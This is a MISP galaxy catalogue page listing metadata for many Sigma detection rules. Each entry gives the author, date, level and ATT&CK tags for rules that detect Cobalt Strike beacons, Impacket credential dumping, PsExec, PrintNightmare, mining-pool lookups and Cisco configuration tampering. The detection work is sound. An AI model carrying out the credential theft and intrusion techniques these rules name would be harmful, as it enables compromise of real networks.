Skip to content

Hide Navigation Hide TOC

Edit

Sigma-Rules

MISP galaxy cluster based on Sigma Rules.

Authors
Authors and/or Contributors
@Joseliyo_Jstnk

Juniper BGP Missing MD5

Detects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.

Internal MISP references

UUID a7c0ae48-8df8-42bf-91bd-2ea57e2f9d43 which can be used as unique global reference for Juniper BGP Missing MD5 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Brown
creation_date 2023/01/09
falsepositive ['Unlikely. Except due to misconfigurations']
filename juniper_bgp_missing_md5.yml
level low
logsource.category No established category
logsource.product juniper
tags ['attack.initial_access', 'attack.persistence', 'attack.privilege_escalation', 'attack.defense_evasion', 'attack.credential_access', 'attack.collection', 'attack.t1078', 'attack.t1110', 'attack.t1557']
Related clusters

To see the related clusters, click here.

Cleartext Protocol Usage

Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.

Internal MISP references

UUID d7fb8f0e-bd5f-45c2-b467-19571c490d7e which can be used as unique global reference for Cleartext Protocol Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexandr Yampolskyi, SOC Prime, Tim Shelton
creation_date 2019/03/26
falsepositive ['Unknown']
filename net_firewall_cleartext_protocols.yml
level low
logsource.category firewall
logsource.product No established product
tags ['attack.credential_access']

Telegram Bot API Request

Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind

Internal MISP references

UUID c64c5175-5189-431b-a55e-6d9882158251 which can be used as unique global reference for Telegram Bot API Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/06/05
falsepositive ['Legitimate use of Telegram bots in the company']
filename net_dns_susp_telegram_api.yml
level medium
logsource.category dns
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1102.002']
Related clusters

To see the related clusters, click here.

DNS Query to External Service Interaction Domains

Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE

Internal MISP references

UUID aff715fa-4dd5-497a-8db3-910bea555566 which can be used as unique global reference for DNS Query to External Service Interaction Domains in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Matt Kelly (list of domains)
creation_date 2022/06/07
falsepositive ['Unknown']
filename net_dns_external_service_interaction_domains.yml
level high
logsource.category dns
logsource.product No established product
tags ['attack.initial_access', 'attack.t1190', 'attack.reconnaissance', 'attack.t1595.002']
Related clusters

To see the related clusters, click here.

Cobalt Strike DNS Beaconing

Detects suspicious DNS queries known from Cobalt Strike beacons

Internal MISP references

UUID 2975af79-28c4-4d2f-a951-9095f229df29 which can be used as unique global reference for Cobalt Strike DNS Beaconing in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/05/10
falsepositive ['Unknown']
filename net_dns_mal_cobaltstrike.yml
level critical
logsource.category dns
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.004']
Related clusters

To see the related clusters, click here.

DNS TXT Answer with Possible Execution Strings

Detects strings used in command execution in DNS TXT Answer

Internal MISP references

UUID 8ae51330-899c-4641-8125-e39f2e07da72 which can be used as unique global reference for DNS TXT Answer with Possible Execution Strings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2018/08/08
falsepositive ['Unknown']
filename net_dns_susp_txt_exec_strings.yml
level high
logsource.category dns
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.004']
Related clusters

To see the related clusters, click here.

Suspicious DNS Query with B64 Encoded String

Detects suspicious DNS queries using base64 encoding

Internal MISP references

UUID 4153a907-2451-4e4f-a578-c52bb6881432 which can be used as unique global reference for Suspicious DNS Query with B64 Encoded String in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/05/10
falsepositive ['Unknown']
filename net_dns_susp_b64_queries.yml
level medium
logsource.category dns
logsource.product No established product
tags ['attack.exfiltration', 'attack.t1048.003', 'attack.command_and_control', 'attack.t1071.004']
Related clusters

To see the related clusters, click here.

Wannacry Killswitch Domain

Detects wannacry killswitch domain dns queries

Internal MISP references

UUID 3eaf6218-3bed-4d8a-8707-274096f12a18 which can be used as unique global reference for Wannacry Killswitch Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mike Wade
creation_date 2020/09/16
falsepositive ['Analyst testing']
filename net_dns_wannacry_killswitch_domain.yml
level high
logsource.category dns
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Monero Crypto Coin Mining Pool Lookup

Detects suspicious DNS queries to Monero mining pools

Internal MISP references

UUID b593fd50-7335-4682-a36c-4edcb68e4641 which can be used as unique global reference for Monero Crypto Coin Mining Pool Lookup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/10/24
falsepositive ['Legitimate crypto coin mining']
filename net_dns_pua_cryptocoin_mining_xmr.yml
level high
logsource.category dns
logsource.product No established product
tags ['attack.impact', 'attack.t1496', 'attack.t1567']
Related clusters

To see the related clusters, click here.

Cisco Discovery

Find information about network devices that is not stored in config files

Internal MISP references

UUID 9705a6a1-6db6-4a16-a987-15b7151e299b which can be used as unique global reference for Cisco Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/12
falsepositive ['Commonly used by administrators for troubleshooting']
filename cisco_cli_discovery.yml
level low
logsource.category No established category
logsource.product cisco
tags ['attack.discovery', 'attack.t1083', 'attack.t1201', 'attack.t1057', 'attack.t1018', 'attack.t1082', 'attack.t1016', 'attack.t1049', 'attack.t1033', 'attack.t1124']
Related clusters

To see the related clusters, click here.

Cisco Modify Configuration

Modifications to a config that will serve an adversary's impacts or persistence

Internal MISP references

UUID 671ffc77-50a7-464f-9e3d-9ea2b493b26b which can be used as unique global reference for Cisco Modify Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/12
falsepositive ['Legitimate administrators may run these commands']
filename cisco_cli_modify_config.yml
level medium
logsource.category No established category
logsource.product cisco
tags ['attack.persistence', 'attack.impact', 'attack.t1490', 'attack.t1505', 'attack.t1565.002', 'attack.t1053']
Related clusters

To see the related clusters, click here.

Cisco File Deletion

See what files are being deleted from flash file systems

Internal MISP references

UUID 71d65515-c436-43c0-841b-236b1f32c21e which can be used as unique global reference for Cisco File Deletion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/12
falsepositive ['Will be used sometimes by admins to clean up local flash space']
filename cisco_cli_file_deletion.yml
level medium
logsource.category No established category
logsource.product cisco
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1070.004', 'attack.t1561.001', 'attack.t1561.002']
Related clusters

To see the related clusters, click here.

Cisco Stage Data

Various protocols maybe used to put data on the device for exfil or infil

Internal MISP references

UUID 5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59 which can be used as unique global reference for Cisco Stage Data in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/12
falsepositive ['Generally used to copy configs or IOS images']
filename cisco_cli_moving_data.yml
level low
logsource.category No established category
logsource.product cisco
tags ['attack.collection', 'attack.lateral_movement', 'attack.command_and_control', 'attack.exfiltration', 'attack.t1074', 'attack.t1105', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

Cisco Show Commands Input

See what commands are being input into the device by other people, full credentials can be in the history

Internal MISP references

UUID b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b which can be used as unique global reference for Cisco Show Commands Input in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/11
falsepositive ['Not commonly run by administrators, especially if remote logging is configured']
filename cisco_cli_input_capture.yml
level medium
logsource.category No established category
logsource.product cisco
tags ['attack.credential_access', 'attack.t1552.003']
Related clusters

To see the related clusters, click here.

Cisco Collect Data

Collect pertinent data from the configuration files

Internal MISP references

UUID cd072b25-a418-4f98-8ebc-5093fb38fe1a which can be used as unique global reference for Cisco Collect Data in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/11
falsepositive ['Commonly run by administrators']
filename cisco_cli_collect_data.yml
level low
logsource.category No established category
logsource.product cisco
tags ['attack.discovery', 'attack.credential_access', 'attack.collection', 'attack.t1087.001', 'attack.t1552.001', 'attack.t1005']
Related clusters

To see the related clusters, click here.

Cisco Disabling Logging

Turn off logging locally or remote

Internal MISP references

UUID 9e8f6035-88bf-4a63-96b6-b17c0508257e which can be used as unique global reference for Cisco Disabling Logging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/11
falsepositive ['Unknown']
filename cisco_cli_disable_logging.yml
level high
logsource.category No established category
logsource.product cisco
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Cisco Denial of Service

Detect a system being shutdown or put into different boot mode

Internal MISP references

UUID d94a35f0-7a29-45f6-90a0-80df6159967c which can be used as unique global reference for Cisco Denial of Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/15
falsepositive ['Legitimate administrators may run these commands, though rarely.']
filename cisco_cli_dos.yml
level medium
logsource.category No established category
logsource.product cisco
tags ['attack.impact', 'attack.t1495', 'attack.t1529', 'attack.t1565.001']
Related clusters

To see the related clusters, click here.

Cisco Sniffing

Show when a monitor or a span/rspan is setup or modified

Internal MISP references

UUID b9e1f193-d236-4451-aaae-2f3d2102120d which can be used as unique global reference for Cisco Sniffing in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/11
falsepositive ['Admins may setup new or modify old spans, or use a monitor for troubleshooting']
filename cisco_cli_net_sniff.yml
level medium
logsource.category No established category
logsource.product cisco
tags ['attack.credential_access', 'attack.discovery', 'attack.t1040']
Related clusters

To see the related clusters, click here.

Cisco Local Accounts

Find local accounts being created or modified as well as remote authentication configurations

Internal MISP references

UUID 6d844f0f-1c18-41af-8f19-33e7654edfc3 which can be used as unique global reference for Cisco Local Accounts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/12
falsepositive ['When remote authentication is in place, this should not change often']
filename cisco_cli_local_accounts.yml
level high
logsource.category No established category
logsource.product cisco
tags ['attack.persistence', 'attack.t1136.001', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Cisco Crypto Commands

Show when private keys are being exported from the device, or when new certificates are installed

Internal MISP references

UUID 1f978c6a-4415-47fb-aca5-736a44d7ca3d which can be used as unique global reference for Cisco Crypto Commands in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/12
falsepositive ['Not commonly run by administrators. Also whitelist your known good certificates']
filename cisco_cli_crypto_actions.yml
level high
logsource.category No established category
logsource.product cisco
tags ['attack.credential_access', 'attack.defense_evasion', 'attack.t1553.004', 'attack.t1552.004']
Related clusters

To see the related clusters, click here.

Cisco Clear Logs

Clear command history in network OS which is used for defense evasion

Internal MISP references

UUID ceb407f6-8277-439b-951f-e4210e3ed956 which can be used as unique global reference for Cisco Clear Logs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Clark
creation_date 2019/08/12
falsepositive ['Legitimate administrators may run these commands']
filename cisco_cli_clear_logs.yml
level high
logsource.category No established category
logsource.product cisco
tags ['attack.defense_evasion', 'attack.t1070.003']
Related clusters

To see the related clusters, click here.

Cisco LDP Authentication Failures

Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels

Internal MISP references

UUID 50e606bf-04ce-4ca7-9d54-3449494bbd4b which can be used as unique global reference for Cisco LDP Authentication Failures in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Brown
creation_date 2023/01/09
falsepositive ['Unlikely. Except due to misconfigurations']
filename cisco_ldp_md5_auth_failed.yml
level low
logsource.category No established category
logsource.product cisco
tags ['attack.initial_access', 'attack.persistence', 'attack.privilege_escalation', 'attack.defense_evasion', 'attack.credential_access', 'attack.collection', 'attack.t1078', 'attack.t1110', 'attack.t1557']
Related clusters

To see the related clusters, click here.

Cisco BGP Authentication Failures

Detects BGP failures which may be indicative of brute force attacks to manipulate routing

Internal MISP references

UUID 56fa3cd6-f8d6-4520-a8c7-607292971886 which can be used as unique global reference for Cisco BGP Authentication Failures in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Brown
creation_date 2023/01/09
falsepositive ['Unlikely. Except due to misconfigurations']
filename cisco_bgp_md5_auth_failed.yml
level low
logsource.category No established category
logsource.product cisco
tags ['attack.initial_access', 'attack.persistence', 'attack.privilege_escalation', 'attack.defense_evasion', 'attack.credential_access', 'attack.collection', 'attack.t1078', 'attack.t1110', 'attack.t1557']
Related clusters

To see the related clusters, click here.

Huawei BGP Authentication Failures

Detects BGP failures which may be indicative of brute force attacks to manipulate routing.

Internal MISP references

UUID a557ffe6-ac54-43d2-ae69-158027082350 which can be used as unique global reference for Huawei BGP Authentication Failures in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Brown
creation_date 2023/01/09
falsepositive ['Unlikely. Except due to misconfigurations']
filename huawei_bgp_auth_failed.yml
level low
logsource.category No established category
logsource.product huawei
tags ['attack.initial_access', 'attack.persistence', 'attack.privilege_escalation', 'attack.defense_evasion', 'attack.credential_access', 'attack.collection', 'attack.t1078', 'attack.t1110', 'attack.t1557']
Related clusters

To see the related clusters, click here.

Default Cobalt Strike Certificate

Detects the presence of default Cobalt Strike certificate in the HTTPS traffic

Internal MISP references

UUID 7100f7e3-92ce-4584-b7b7-01b40d3d4118 which can be used as unique global reference for Default Cobalt Strike Certificate in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2021/06/23
falsepositive ['Unknown']
filename zeek_default_cobalt_strike_certificate.yml
level high
logsource.category No established category
logsource.product zeek
tags ['attack.command_and_control', 'attack.s0154']

Publicly Accessible RDP Service

Detects connections from routable IPs to an RDP listener. Which is indicative of a publicly-accessible RDP service.

Internal MISP references

UUID 1fc0809e-06bf-4de3-ad52-25e5263b7623 which can be used as unique global reference for Publicly Accessible RDP Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Josh Brower @DefensiveDepth
creation_date 2020/08/22
falsepositive ['Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet.']
filename zeek_rdp_public_listener.yml
level high
logsource.category No established category
logsource.product zeek
tags ['attack.lateral_movement', 'attack.t1021.001']
Related clusters

To see the related clusters, click here.

Kerberos Network Traffic RC4 Ticket Encryption

Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting

Internal MISP references

UUID 503fe26e-b5f2-4944-a126-eab405cc06e5 which can be used as unique global reference for Kerberos Network Traffic RC4 Ticket Encryption in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author sigma
creation_date 2020/02/12
falsepositive ['Normal enterprise SPN requests activity']
filename zeek_susp_kerberos_rc4.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.credential_access', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

Potential PetitPotam Attack Via EFS RPC Calls

Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'

Internal MISP references

UUID 4096842a-8f9f-4d36-92b4-d0b2a62f9b2a which can be used as unique global reference for Potential PetitPotam Attack Via EFS RPC Calls in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron, @Antonlovesdnb, Mike Remen
creation_date 2021/08/17
falsepositive ['Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).']
filename zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.t1557.001', 'attack.t1187']
Related clusters

To see the related clusters, click here.

WebDav Put Request

A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.

Internal MISP references

UUID 705072a5-bb6f-4ced-95b6-ecfa6602090b which can be used as unique global reference for WebDav Put Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Unknown']
filename zeek_http_webdav_put_request.yml
level low
logsource.category No established category
logsource.product zeek
tags ['attack.exfiltration', 'attack.t1048.003']
Related clusters

To see the related clusters, click here.

Remote Task Creation via ATSVC Named Pipe - Zeek

Detects remote task creation via at.exe or API interacting with ATSVC namedpipe

Internal MISP references

UUID dde85b37-40cd-4a94-b00c-0b8794f956b5 which can be used as unique global reference for Remote Task Creation via ATSVC Named Pipe - Zeek in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, @neu5rn
creation_date 2020/04/03
falsepositive ['Unknown']
filename zeek_smb_converted_win_atsvc_task.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.lateral_movement', 'attack.persistence', 'car.2013-05-004', 'car.2015-04-001', 'attack.t1053.002']
Related clusters

To see the related clusters, click here.

Executable from Webdav

Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/

Internal MISP references

UUID aac2fd97-bcba-491b-ad66-a6edf89c71bf which can be used as unique global reference for Executable from Webdav in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author SOC Prime, Adam Swan
creation_date 2020/05/01
falsepositive ['Unknown']
filename zeek_http_executable_download_from_webdav.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

DNS TOR Proxies

Identifies IPs performing DNS lookups associated with common Tor proxies.

Internal MISP references

UUID a8322756-015c-42e7-afb1-436e85ed3ff5 which can be used as unique global reference for DNS TOR Proxies in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Saw Winn Naung , Azure-Sentinel
creation_date 2021/08/15
falsepositive ['Unknown']
filename zeek_dns_torproxy.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.exfiltration', 'attack.t1048']
Related clusters

To see the related clusters, click here.

OMIGOD HTTP No Authentication RCE

Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.

Internal MISP references

UUID ab6b1a39-a9ee-4ab4-b075-e83acf6e346b which can be used as unique global reference for OMIGOD HTTP No Authentication RCE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nate Guagenti (neu5ron)
creation_date 2021/09/20
falsepositive ['Exploits that were attempted but unsuccessful.', 'Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips.']
filename zeek_http_omigod_no_auth_rce.yml
level high
logsource.category No established category
logsource.product zeek
tags ['attack.privilege_escalation', 'attack.initial_access', 'attack.execution', 'attack.lateral_movement', 'attack.t1068', 'attack.t1190', 'attack.t1203', 'attack.t1021.006', 'attack.t1210']
Related clusters

To see the related clusters, click here.

MITRE BZAR Indicators for Execution

Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE

Internal MISP references

UUID b640c0b8-87f8-4daa-aef8-95a24261dd1d which can be used as unique global reference for MITRE BZAR Indicators for Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron, SOC Prime
creation_date 2020/03/19
falsepositive ['Windows administrator tasks or troubleshooting', 'Windows management scripts or software']
filename zeek_dce_rpc_mitre_bzar_execution.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.execution', 'attack.t1047', 'attack.t1053.002', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Possible Impacket SecretDump Remote Activity - Zeek

Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml

Internal MISP references

UUID 92dae1ed-1c9d-4eff-a567-33acbd95b00e which can be used as unique global reference for Possible Impacket SecretDump Remote Activity - Zeek in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, @neu5ron
creation_date 2020/03/19
falsepositive ['Unknown']
filename zeek_smb_converted_win_impacket_secretdump.yml
level high
logsource.category No established category
logsource.product zeek
tags ['attack.credential_access', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Suspicious PsExec Execution - Zeek

detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one

Internal MISP references

UUID f1b3a22a-45e6-4004-afb5-4291f9c21166 which can be used as unique global reference for Suspicious PsExec Execution - Zeek in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, @neu5ron, Tim Shelton
creation_date 2020/04/02
falsepositive ['Unknown']
filename zeek_smb_converted_win_susp_psexec.yml
level high
logsource.category No established category
logsource.product zeek
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

New Kind of Network (NKN) Detection

NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>

Internal MISP references

UUID fa7703d6-0ee8-4949-889c-48c84bc15b6f which can be used as unique global reference for New Kind of Network (NKN) Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Portera (@mportatoes)
creation_date 2022/04/21
falsepositive ['Unknown']
filename zeek_dns_nkn.yml
level low
logsource.category No established category
logsource.product zeek
tags ['attack.command_and_control']

MITRE BZAR Indicators for Persistence

Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.

Internal MISP references

UUID 53389db6-ba46-48e3-a94c-e0f2cefe1583 which can be used as unique global reference for MITRE BZAR Indicators for Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron, SOC Prime
creation_date 2020/03/19
falsepositive ['Windows administrator tasks or troubleshooting', 'Windows management scripts or software']
filename zeek_dce_rpc_mitre_bzar_persistence.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.persistence', 'attack.t1547.004']
Related clusters

To see the related clusters, click here.

SMB Spoolss Name Piped Usage

Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.

Internal MISP references

UUID bae2865c-5565-470d-b505-9496c87d0c30 which can be used as unique global reference for SMB Spoolss Name Piped Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author OTR (Open Threat Research), @neu5ron
creation_date 2018/11/28
falsepositive ['Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too']
filename zeek_dce_rpc_smb_spoolss_named_pipe.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Identifies clients that may be performing DNS lookups associated with common currency mining pools.

Internal MISP references

UUID bf74135c-18e8-4a72-a926-0e4f47888c19 which can be used as unique global reference for DNS Events Related To Mining Pools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Saw Winn Naung, Azure-Sentinel, @neu5ron
creation_date 2021/08/19
falsepositive ["A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'."]
filename zeek_dns_mining_pools.yml
level low
logsource.category No established category
logsource.product zeek
tags ['attack.execution', 'attack.t1569.002', 'attack.impact', 'attack.t1496']
Related clusters

To see the related clusters, click here.

Possible PrintNightmare Print Driver Install

Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.

Internal MISP references

UUID 7b33baef-2a75-4ca3-9da4-34f9a15382d8 which can be used as unique global reference for Possible PrintNightmare Print Driver Install in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron (Nate Guagenti)
creation_date 2021/08/23
falsepositive ['Legitimate remote alteration of a printer driver.']
filename zeek_dce_rpc_printnightmare_print_driver_install.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.execution', 'cve.2021.1678', 'cve.2021.1675', 'cve.2021.34527']

Suspicious Access to Sensitive File Extensions - Zeek

Detects known sensitive file extensions via Zeek

Internal MISP references

UUID 286b47ed-f6fe-40b3-b3a8-35129acd43bc which can be used as unique global reference for Suspicious Access to Sensitive File Extensions - Zeek in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, @neu5ron
creation_date 2020/04/02
falsepositive ['Help Desk operator doing backup or re-imaging end user machine or backup software', 'Users working with these data types or exchanging message files']
filename zeek_smb_converted_win_susp_raccess_sensitive_fext.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.collection']

First Time Seen Remote Named Pipe - Zeek

This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes

Internal MISP references

UUID 021310d9-30a6-480a-84b7-eaa69aeb92bb which can be used as unique global reference for First Time Seen Remote Named Pipe - Zeek in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, @neu5ron, Tim Shelton
creation_date 2020/04/02
falsepositive ['Update the excluded named pipe to filter out any newly observed legit named pipe']
filename zeek_smb_converted_win_lm_namedpipe.yml
level high
logsource.category No established category
logsource.product zeek
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Transferring Files with Credential Data via Network Shares - Zeek

Transferring files with well-known filenames (sensitive files with credential data) using network shares

Internal MISP references

UUID 2e69f167-47b5-4ae7-a390-47764529eff5 which can be used as unique global reference for Transferring Files with Credential Data via Network Shares - Zeek in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron, Teymur Kheirkhabarov, oscd.community
creation_date 2020/04/02
falsepositive ['Transferring sensitive files for legitimate administration work by legitimate administrator']
filename zeek_smb_converted_win_transferring_files_with_credential_data.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.credential_access', 'attack.t1003.002', 'attack.t1003.001', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Suspicious DNS Z Flag Bit Set

The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused). Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare. Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward. Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering. This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'

Internal MISP references

UUID ede05abc-2c9e-4624-9944-9ff17fdc0bf5 which can be used as unique global reference for Suspicious DNS Z Flag Bit Set in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron, SOC Prime Team, Corelight
creation_date 2021/05/04
falsepositive ['Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.', 'If you work in a Public Sector then it may be good to exclude things like endswith ".edu", ".gov" and or ".mil"']
filename zeek_dns_susp_zbit_flag.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.t1095', 'attack.t1571', 'attack.command_and_control']
Related clusters

To see the related clusters, click here.

Django Framework Exceptions

Detects suspicious Django web application framework exceptions that could indicate exploitation attempts

Internal MISP references

UUID fd435618-981e-4a7c-81f8-f78ce480d616 which can be used as unique global reference for Django Framework Exceptions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/08/05
falsepositive ['Application bugs']
filename appframework_django_exceptions.yml
level medium
logsource.category application
logsource.product django
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Potential RCE Exploitation Attempt In NodeJS

Detects process execution related errors in NodeJS. If the exceptions are caused due to user input then they may suggest an RCE vulnerability.

Internal MISP references

UUID 97661d9d-2beb-4630-b423-68985291a8af which can be used as unique global reference for Potential RCE Exploitation Attempt In NodeJS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moti Harmats
creation_date 2023/02/11
